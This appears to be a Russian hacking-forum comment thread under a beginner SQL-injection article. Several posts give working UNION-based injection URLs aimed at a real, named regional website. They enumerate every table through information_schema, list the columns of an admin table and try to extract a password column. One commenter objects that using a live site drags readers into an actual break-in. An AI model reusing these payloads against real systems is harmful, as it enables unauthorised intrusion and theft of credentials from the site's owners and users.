Авторские статьи SQL Injection для "совсем новичков"

Discussion in 'Статьи' started by Boa, 17 Jul 2010.

  1. Alex1

    Alex1 Elder - Старейшина

    Joined:
    8 Mar 2007
    Messages:
    63
    Likes Received:
    38
    Reputations:
    0
    Спасибо.
     
  2. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    404
    Likes Received:
    118
    Reputations:
    23
    какая версия mysql, может это вообще не mysql и там другие правила, ?

    )), не удивительно, а ты задумывался что будет в этом случае )). Если конвертить 0x5573657273 даже в hex то будет 307835353733363537323733, я уже даже не говорю что будет если это будет Hax.
    P.S. намек: зачем хексить хекс... может лучше UNHEX(0x5573657273), а если по правде, то я вам не скажу за всю SQL, вся SQL слишком велика, но MySQL 3 по 5 обожают чистый хекс т.е. 0x5573657273, но в данном случае это не прокатит, по краней мере на моей памяти хекс работал только в where и в функциях
     
    #42 lukmus, 6 Sep 2010
    Last edited: 6 Sep 2010
  3. J0cker

    J0cker New Member

    Joined:
    27 Feb 2010
    Messages:
    62
    Likes Received:
    4
    Reputations:
    0
    Версия 5.0.54

    Ну методом научного тыка пытался что то сделать )).
    Просто не могу понять как вывести значение столбца.
    Code:
    http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,column_name,15,16,17,18,19,20,21,22,23,24+from+INFORMATION_SCHEMA.columns+where+table_name=unhex(7573657273)+--+
    Так получаю нормальные названия столбцов.Смысла от финта ушами типа Unhex не увидел.

    Code:
    http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,passwd,15,16,17,18,19,20,21,22,23,24+from+unhex(7573657273)+--+
    
    не получается получить строку из столбца passwd и все как только не извращался над ним.
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    J0cker при выборке данных из конкретной таблицы, нельзя писать имя таблици в ascii или hex

    select column from 'имя_таблици_в_плавном_виде'
     
    _________________________
  5. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Так, давайте выведем все таблицы:
    Code:
    http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,concat%28@i:=0x00,@o:=0x0d0a,benchmark%28400,@o:=CONCAT%28@o,0x0d0a,%28SELECT+concat%28table_schema,0x2E,@i:=table_name%29+from+information_schema.tables+WHERE+table_name%3E@i+order+by+table_name+LIMIT%201%29%29%29,@o%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+
    Я там нашёл city_351.admin
    Выведем колонки city_351.admin:
    Code:
    http://region-info.ru/?city=1&&cid=343&&fid=5067+union+select+1,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns+where+table_name=0x61646d696e+--+
    Вместо 0x61646d696e пишем название таблицы в HEX виде. HEX вид можно получить тут
    Вот и всё, таким образом Вы можете выводить колонки таблиц.
     
  6. xarbat

    xarbat New Member

    Joined:
    28 Aug 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Xоть я в этом деле не шарю, единственная статья в которой все понятно прочитал их около 10, но везде урезками, или фразами не понятные новечкам. Автору распект!!!
     
  7. desad666

    desad666 New Member

    Joined:
    15 Aug 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    спасибо
     
  8. BlackW00D

    BlackW00D New Member

    Joined:
    10 Oct 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Спасибо за статью,новачкам будет полезно...
     
  9. Gusev

    Gusev Banned

    Joined:
    4 Sep 2010
    Messages:
    86
    Likes Received:
    8
    Reputations:
    -5
    И не только...

    И не только новичкам. Я к примеру кое что новое узнал (мало правда, но всё же)
     
  10. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    По-моему, бред подставлять в статье реальный адрес сайта. Это же надо было додуматься до такого...

    Читайте лучше полный FAQ по SQL-inj.
     
  11. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Как ни старался, ни нашел ничего бредового. Наглядный пример и все.
    Ну это без комментариев.
     
  12. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Зачем Вы пишет этот гуан?
    Есть уже куча подобных материалов на эту тему, которые тоже гуан.
    На _данном_форуме_, пожалуй, самый лучший материал был у нуля, к тому же в его теме было очень много дополнений.

    Статьи нужно писать для того, чтобы донести до пользователя что то новое и интересное(ну или хотя бы просто интересное), а не для того, чтобы показать всем уровень своих знаний(который, судя по статье, ничтожен).

    Подумайте над этим.
     
    1 person likes this.
  13. filinAr

    filinAr New Member

    Joined:
    1 Oct 2010
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Ничего нового, уже много статей есть на эту тему, где всё хорошо разжевано.
     
  14. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    Статьи нужно писать, чтобы донести до пользователя информацию. Новое и интересное - опционально.
    Я хоть где нибудь говорил, что в моей статье есть что-то новое, оригинальное? Я просто описал основы понятным языком, на что и сделан упор.
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Тупой копипаст другими словами. Дай асю, пару вопросов задам.. посмотрим на твои знания. В моё время кое кто именно так меня проверял =\
     
  16. Boa

    Boa Member

    Joined:
    30 May 2010
    Messages:
    86
    Likes Received:
    29
    Reputations:
    18
    -PRIVAT- покажи мне, где я хоть раз утверждал, что отличный хекер и знаю об инъекциях чуть менее, чем все.
    Асю не дам :Р
     
  17. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    нормальная статья
     
  18. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    еврейский шедевр!
    я по этой статье научился всему.. теперь me ломаю телекоммуникационные сети и соц сети..
     
  19. Rebz

    Rebz Banned

    Joined:
    8 Nov 2004
    Messages:
    4,052
    Likes Received:
    1,534
    Reputations:
    1,128
    Весь бред в том, что админы сайта наверняка умеют пользоваться поисковиком или им подкинут ссылку на эту тему. Ты вообще понимаешь, что ты этим самым подставляешь ачат? К тому же, палишь и ленивых новичков, которые добросоветсно будут заходить по ссылкам, т.е. участвовать во взломе. Можно запросто их всех привлечь к ответственности, логов будет предостаточно. А ленивые - потому что не могут посмотеть нормальную статью от Dr.Z3r0 --> https://forum.antichat.net/thread43966.html.
     
  20. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    логи не являються доказательством